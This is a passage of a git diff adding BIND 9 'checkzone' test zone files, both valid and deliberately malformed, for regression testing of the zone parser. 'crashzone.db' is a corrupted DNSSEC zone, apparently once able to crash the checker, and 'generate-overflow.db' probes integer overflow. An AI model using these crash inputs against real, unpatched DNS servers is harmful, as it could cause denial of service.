@@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +svcb SVCB 0 . mandatory=alpn diff --git a/bin/tests/system/checkzone/zones/bad-svcb-servername.db b/bin/tests/system/checkzone/zones/bad-svcb-servername.db new file mode 100644 index 0000000..61751a0 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-svcb-servername.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +svcb SVCB 1 _underscore.example. port=60 alpn=h3 ech="ZWFzdGVyIGVnZyE=" diff --git a/bin/tests/system/checkzone/zones/bad-svcb.db b/bin/tests/system/checkzone/zones/bad-svcb.db new file mode 100644 index 0000000..ad710bf --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-svcb.db 
@@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +svcb SVCB 0 . unknown=wha diff --git a/bin/tests/system/checkzone/zones/bad-tkey.db b/bin/tests/system/checkzone/zones/bad-tkey.db new file mode 100644 index 0000000..a030074 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-tkey.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +tkey TKEY invalid.algorithm. 1516055980 1516140801 1 0 16 gRof8D2BFKvl/vrr9Lmnjw== 16 gRof8D2BFKvl/vrr9Lmnjw== diff --git a/bin/tests/system/checkzone/zones/bad-tsig.db.in b/bin/tests/system/checkzone/zones/bad-tsig.db.in new file mode 100644 index 0000000..daef06c --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-tsig.db.in 
@@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +tsig TSIG @DEFAULT_HMAC@ 1516135665 300 20 thBt8DheAD7qpqSFTiGK999sxGg= 54994 NOERROR 0 diff --git a/bin/tests/system/checkzone/zones/bad-unspec.db b/bin/tests/system/checkzone/zones/bad-unspec.db new file mode 100644 index 0000000..e5abefe --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-unspec.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 +example IN TYPE103 ^# 1 00 diff --git a/bin/tests/system/checkzone/zones/bad1.db b/bin/tests/system/checkzone/zones/bad1.db Binary files differnew file mode 100644 index 0000000..05ab829 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad1.db diff --git a/bin/tests/system/checkzone/zones/bad2.db b/bin/tests/system/checkzone/zones/bad2.db new file mode 100644 index 0000000..38e82e6 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad2.db 
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2011012708 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+
+; The following GENERATE directive contains two dashes in the range
+; which is a syntax error.
+$GENERATE 9--10 host$ 3600 A 192.0.2.$
diff --git a/bin/tests/system/checkzone/zones/bad3.db b/bin/tests/system/checkzone/zones/bad3.db
new file mode 100644
index 0000000..1391afe
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/bad3.db
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2011012708 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+;
+; A trailing '/' is not permitted.
+;
+$GENERATE 1-3/ $ A 1.2.3.$
diff --git a/bin/tests/system/checkzone/zones/bad4.db b/bin/tests/system/checkzone/zones/bad4.db
new file mode 100644
index 0000000..99def7a
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/bad4.db
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2011012708 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+;
+; A step of zero is not permitted.
+;
+$GENERATE 1-3/0 $ A 1.2.3.$
diff --git a/bin/tests/system/checkzone/zones/badttl.db b/bin/tests/system/checkzone/zones/badttl.db
new file mode 100644
index 0000000..95cd422
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/badttl.db
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL
+@ SOA ns hostmaster 2011012708 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+
+ns-and-dname NS ns.ns-and-dname
+ DNAME example.com.
+ns.ns-and-dname A 203.178.141.207
diff --git a/bin/tests/system/checkzone/zones/crashzone.db b/bin/tests/system/checkzone/zones/crashzone.db
new file mode 100644
index 0000000..2a62e2a
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/crashzone.db
@@ -0,0 +1,62 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+dyn.example.net. 7200 IN SOA ns1.example.net. hostmaster.example.net. (
+ 6 ; serial
+ 43200 ; refresh (12 hours)
+ 1800 ; retry (30 minutes)
+ 1209600 ; expire (2 weeks)
+ 7200 ; minimum (2 hours)
+ )
+ 7200 RRSIG SOA 7 3 7200 2010 20100225214229 30323 dyn.example.net. MuyI
+ 7200 NS ns1.example.net.
+ 7200 NS ns2.example.net.
+ 3600 RRSIG DNSKEY 7 3 3600 20100227180048 (
+ 20100221180048 52935 dyn.example.net.
+ MuyIUCa3XlttWuSnaQegQnRgTrTsx0Mj4EGI
+ fwtZs2H3L079Y/brqMvtlIGxtlr9meLg43oo
+ jX1w48ilerzf1PwYhtVpFefZTgmClK0h2ej4
+ Ho9Qh4/6snesVj06kWsQDkhuVs58zHmhRtEy
+ P4YlqP/R1CAk166RhwSmGuSx1O8= )
+ 0 NSEC3PARAM 1 0 10 76931F
+ns1.dyn.example.net. 7200 IN A 1.0.0.5
+ 7200 AAAA 2001:db8::53
+ 7200 RRSIG AAAA 7 4 7200 20100227180048 (
+ 20100221180048 30323 dyn.example.net.
+ dk1DfG0y9qjCi3VD4e9B1NGKWEig7q8hFdaR
+ 3hElCIzGlflvgHRiE7iTJxDMB+kTA0by4BMZ
+ yssUuXP2FMlB2g== )
+ns2.dyn.example.net. 7200 IN A 1.2.0.6
+y.dyn.example.net. 7200 IN A 1.2.3.5
+z.dyn.example.net. 7200 IN A 1.2.3.6
+A54T6DKFVU4QCKFFNJ0KEU0FH0I4OJSN.dyn.example.net. 7200 IN NSEC3 1 0 10 76931F AJHVGTICN6K0VDA53GCHFMT219SRRQLM A RRSIG
+ò 7200 RRSIG NSEC3 7 4 7200 00100227180048 (
+ 20100221180048 30323 dyn.example.net.
+ 9BhZcQdLwRPU/Dz38uMis/nCcddyhKEm0Zb+
+ Mhh3V3OsGI202cebTaxbwVEbQQOeowpUmf8l
+ AmK/cNX7+IS2rw== )
+AJHVGTICN6K0VDA53GCHFMT219SRRQLM.dyn.example.net. 7200 IN NSEC3 1 0 10 76931F FQ7RBG86KRMACA1NAAKP2KQRQALBA0C7 A RRSIG
+FQ7RBG86KRMACA1NAAKP2KQRQALBA0C7.dyn.example.net. 7200 RRSIG NSEC3 7 4 7200 20100227180048 (
+ 20100221180048 30323 dyn.example.net.
+ 577WZnTQemStx+diON9rEGXAGnU7C0KLjrFL
+ VyhocnBnNtxJS8eRMSWvb9XuYCMNhYKOurtt
+ Ar4qh4VW1+unmA== )
+I7A7A184GGMI35K1E3IR650LKO7NOB5R.dyn.example.net. 7200 IN NSEC3 1 0 10 76931F IMQ912BREQP1POLAH3RMONG;UED541AS A RRSIG
+IMQ912BREQP1POLAH3RMONG3UED541AS.dyn.example.net. 7200 IN NSEC3 1 0 10 76931F S3USV4M1HLVJ8F88EDSG8N9PVQRQ20N7 A RRSIG
+ 7200 RRSIG NSEC3 7 4 7200 20100227180048 (
+ 20100221180048 30323 dyn.example.net.
+ smsg35snQ9PpeG2r8ZGxBl44pwSReh/1rIil
+ u/n8aa5nKbBpkqtbcc7q1OpUgb1Q7+Tl/wes
+ kB6bJA== )
+S3USV4M1HLVJ8F88EDSG8N9PVQRQ20N7.dyn.example.net. 7200 RRSIG NSEC3 7 4 7200 20100227180048 (
+ 20100221180048 30323 dyn.example.net.
+ XalRIESpdeVK1aNbwu9ym2SpK981Y127rKua
+ xsoals0Zn2tTjF9wpOYVGVOto3FcWBbyKD1g
+ 69BTRlv634UIOw== )
+T320G5LC07QE1BLR074KORIJTG9DPTI9.dyn.example.net. 7200 IN NSEC3 1 0 10 76931F A54T6DKFVU4QCAFFNJ0KEU0FH0I4OJSN NS SOA RRSIG DNSKEY NSEC3PARAM
diff --git a/bin/tests/system/checkzone/zones/delegating-ns-address-below-dname.db b/bin/tests/system/checkzone/zones/delegating-ns-address-below-dname.db
new file mode 100644
index 0000000..78c1029
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/delegating-ns-address-below-dname.db
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+example.com. SOA marka.isc.org. a.root.servers.nil. (
+ 2026 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+example.com. NS ns.example.com.
+ns.example.com. A 192.168.0.2
+sub.example.com. NS ns.sub2.example.com.
+sub2.example.com. DNAME example.net.
+ns.sub2.example.com. A 192.168.0.2
diff --git a/bin/tests/system/checkzone/zones/generate-overflow.db b/bin/tests/system/checkzone/zones/generate-overflow.db
new file mode 100644
index 0000000..c16b517
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/generate-overflow.db
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2011012708 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+
+$GENERATE 19-28/2147483645 $ CNAME x
diff --git a/bin/tests/system/checkzone/zones/good-cdnskey.db b/bin/tests/system/checkzone/zones/good-cdnskey.db
new file mode 100644
index 0000000..7892f13
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/good-cdnskey.db
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+example. 0 SOA . . 0 0 0 0 0
+example. 0 NS .
+example. 0 DNSKEY 257 3 10 AwEAAbqjg7xdvnU2Q/gtLw5LOfr5cDeTRjYuEbkzGrUiVSOSoxcTxuao WS/AFPQHuD8OSLiE/CeZ087JowREXl058rRfae8KMrveY17V0wmKs9N1 F1wf/hRDpXiThlRHWlskp8eSEEIqYrrHgWTesy/xDGIEOFM1gwRo0w8j KdRRJeL2hseTMa+m3rTzrYudUsI0BHLW8PiDUCbG5xgdee8/5YR4847i AAqHIiPJ1Z/IT53OIjMmtv5BUykZ8RYjlJxxX+C+dpRKiK73SQaR3hCB XAYOL9WsDp2/fpmEZpewavkMkdC+j2CX+z27MCS3ASO0AeKK0lcNXwND kgreE+Kr7gc=
+example. 0 CDNSKEY 257 3 10 AwEAAbqjg7xdvnU2Q/gtLw5LOfr5cDeTRjYuEbkzGrUiVSOSoxcTxuao WS/AFPQHuD8OSLiE/CeZ087JowREXl058rRfae8KMrveY17V0wmKs9N1 F1wf/hRDpXiThlRHWlskp8eSEEIqYrrHgWTesy/xDGIEOFM1gwRo0w8j KdRRJeL2hseTMa+m3rTzrYudUsI0BHLW8PiDUCbG5xgdee8/5YR4847i AAqHIiPJ1Z/IT53OIjMmtv5BUykZ8RYjlJxxX+C+dpRKiK73SQaR3hCB XAYOL9WsDp2/fpmEZpewavkMkdC+j2CX+z27MCS3ASO0AeKK0lcNXwND kgreE+Kr7gc=
diff --git a/bin/tests/system/checkzone/zones/good-cds-unsigned.db b/bin/tests/system/checkzone/zones/good-cds-unsigned.db
new file mode 100644
index 0000000..9b1737d
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/good-cds-unsigned.db
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+example. 0 SOA . . 0 0 0 0 0
+example. 0 NS .
+example. 0 CDS 0 0 0 00
+example. 0 CDNSKEY 0 3 0 AA==
+
diff --git a/bin/tests/system/checkzone/zones/good-cds.db b/bin/tests/system/checkzone/zones/good-cds.db
new file mode 100644
index 0000000..9200657
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/good-cds.db
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+example. 0 SOA . . 0 0 0 0 0
+example. 0 NS .
+example. 0 DNSKEY 257 3 10 AwEAAbqjg7xdvnU2Q/gtLw5LOfr5cDeTRjYuEbkzGrUiVSOSoxcTxuao WS/AFPQHuD8OSLiE/CeZ087JowREXl058rRfae8KMrveY17V0wmKs9N1 F1wf/hRDpXiThlRHWlskp8eSEEIqYrrHgWTesy/xDGIEOFM1gwRo0w8j KdRRJeL2hseTMa+m3rTzrYudUsI0BHLW8PiDUCbG5xgdee8/5YR4847i AAqHIiPJ1Z/IT53OIjMmtv5BUykZ8RYjlJxxX+C+dpRKiK73SQaR3hCB XAYOL9WsDp2/fpmEZpewavkMkdC+j2CX+z27MCS3ASO0AeKK0lcNXwND kgreE+Kr7gc=
+example. 0 CDS 14364 10 2 FD03B2312C8F0FE72C1751EFA1007D743C94EC91594FF0047C23C37CE119BA0C
diff --git a/bin/tests/system/checkzone/zones/good-dns-sd-reverse.db b/bin/tests/system/checkzone/zones/good-dns-sd-reverse.db
new file mode 100644
index 0000000..fffd27b
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/good-dns-sd-reverse.db
@@ -0,0 +1,23 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 60
+@ IN SOA . . 0 0 0 0 0
+@ IN NS .
+;
+; The following are Service Discovery Prefixes from RFC 6763 and the
+; PTR check-names rules for IN-ADDR.ARPA and IP6.ARPA do not apply.
+;
+b._dns-sd._udp IN PTR !@#3.
+db._dns-sd._udp IN PTR !@#3.
+r._dns-sd._udp IN PTR !@#3.
+dr._dns-sd._udp IN PTR !@#3.
+lb._dns-sd._udp IN PTR !@#3.
diff --git a/bin/tests/system/checkzone/zones/good-gc-msdcs.db b/bin/tests/system/checkzone/zones/good-gc-msdcs.db
new file mode 100644
index 0000000..defd550
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/good-gc-msdcs.db
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2011012708 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+gc._msdcs A 192.0.2.2
diff --git a/bin/tests/system/checkzone/zones/good-generate-modifier.db b/bin/tests/system/checkzone/zones/good-generate-modifier.db
new file mode 100644
index 0000000..3c811d6
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/good-generate-modifier.db
@@ -0,0 +1,20 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2011012708 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+
+$GENERATE 0-7 host$ A 1.2.3.${1,0,d}
+$GENERATE 8-9 host$ A 1.2.3.${1,0}
+$GENERATE 10-11 host$ A 1.2.3.${1}
+$GENERATE 1024-1026 ${0,3,n} AAAA 2001:db8::${0,4,x}
diff --git a/bin/tests/system/checkzone/zones/good-nsap.db b/bin/tests/system/checkzone/zones/good-nsap.db
new file mode 100644
index 0000000..8ad9ee0
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/good-nsap.db
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2011012708 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+
+; empty NSAP address
+example NSAP 0x47.0005.80.005a00.0000....0001.e133.ffffff000162.00
diff --git a/bin/tests/system/checkzone/zones/good-nsec3-nopadhash.db b/bin/tests/system/checkzone/zones/good-nsec3-nopadhash.db
new file mode 100644
index 0000000..5bd378c
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/good-nsec3-nopadhash.db
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2011012708 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+
+; a hash that isn't a multiple of 8 characters
+CPNMU NSEC3 2 1 12 aabbccdd ( CPNMU MX DNSKEY NS
+ SOA NSEC3PARAM RRSIG )
diff --git a/bin/tests/system/checkzone/zones/good-occulted-ns-by-dname.db b/bin/tests/system/checkzone/zones/good-occulted-ns-by-dname.db
new file mode 100644
index 0000000..80fc4a6
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/good-occulted-ns-by-dname.db
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+example. SOA marka.isc.org. a.root.servers.nil. (
+ 2026 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+example. DNAME example.net. ; only the apex record exist
+example. NS ns.example.net. ; out of zone
+foo.example. NS exavider.example. ; no "address" records
diff --git a/bin/tests/system/checkzone/zones/good-occulted-ns-by-ns.db b/bin/tests/system/checkzone/zones/good-occulted-ns-by-ns.db
new file mode 100644
index 0000000..38913b9
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/good-occulted-ns-by-ns.db
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+example. SOA marka.isc.org. a.root.servers.nil. (
+ 2026 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+example. NS ns.example.net. ; out of zone
+foo.example. NS ns.example.net. ; out of zone
+bar.foo.example. NS x.foo.example. ; no address records
diff --git a/bin/tests/system/checkzone/zones/good-spf-exception.db b/bin/tests/system/checkzone/zones/good-spf-exception.db
new file mode 100644
index 0000000..212bfbc
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/good-spf-exception.db
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2011012708 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+a._spf A 192.0.2.2
+a._spf_rate A 192.0.2.2
+a._spf_verify A 192.0.2.2
diff --git a/bin/tests/system/checkzone/zones/good-svcb.db b/bin/tests/system/checkzone/zones/good-svcb.db
new file mode 100644
index 0000000..df868f3
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/good-svcb.db
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2011012708 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+
+svcb0 SVCB 0 example.net.
+svcb1 SVCB 1 . port=60 alpn=h3 ech="ZWFzdGVyIGVnZyE="
+svcb2 SVCB 2 . no-default-alpn alpn=alpn
+svcb3 SVCB 3 . ipv4hint="10.10.10.10"
+svcb4 SVCB 4 . ipv6hint="feed:a::bee"
+svcb5 SVCB 5 . key9999="something"
+svcb6 SVCB 6 . mandatory=port,alpn port=60 alpn=h3
+svcb7 SVCB 7 . mandatory=port,alpn port=60 alpn=h1,h3
+svcb8 SVCB 8 . mandatory=port,alpn port=60 alpn="h1\\,h2,h3"
+svcb9 SVCB 0 44._svbc.example.net.
+svcb10 SVCB 7 . alpn="h2,h3" dohpath=/{?dns}
diff --git a/bin/tests/system/checkzone/zones/good1.db b/bin/tests/system/checkzone/zones/good1.db
new file mode 100644
index 0000000..59eaa54
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/good1.db
@@ -0,0 +1,19 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2011012708 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+
+ns-and-dname NS ns.ns-and-dname
+ DNAME example.com.
+ns.ns-and-dname A 203.178.141.207
diff --git a/bin/tests/system/checkzone/zones/inherit.db b/bin/tests/system/checkzone/zones/inherit.db
new file mode 100644
index 0000000..e075d41
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/inherit.db
@@ -0,0 +1,12 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+ NS .
diff --git a/bin/tests/system/checkzone/zones/nowarn.inherited.owner.db b/bin/tests/system/checkzone/zones/nowarn.inherited.owner.db
new file mode 100644
index 0000000..db26217
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/nowarn.inherited.owner.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 0 IN SOA . . 0 0 0 0 0
+$INCLUDE "zones/inherit.db"
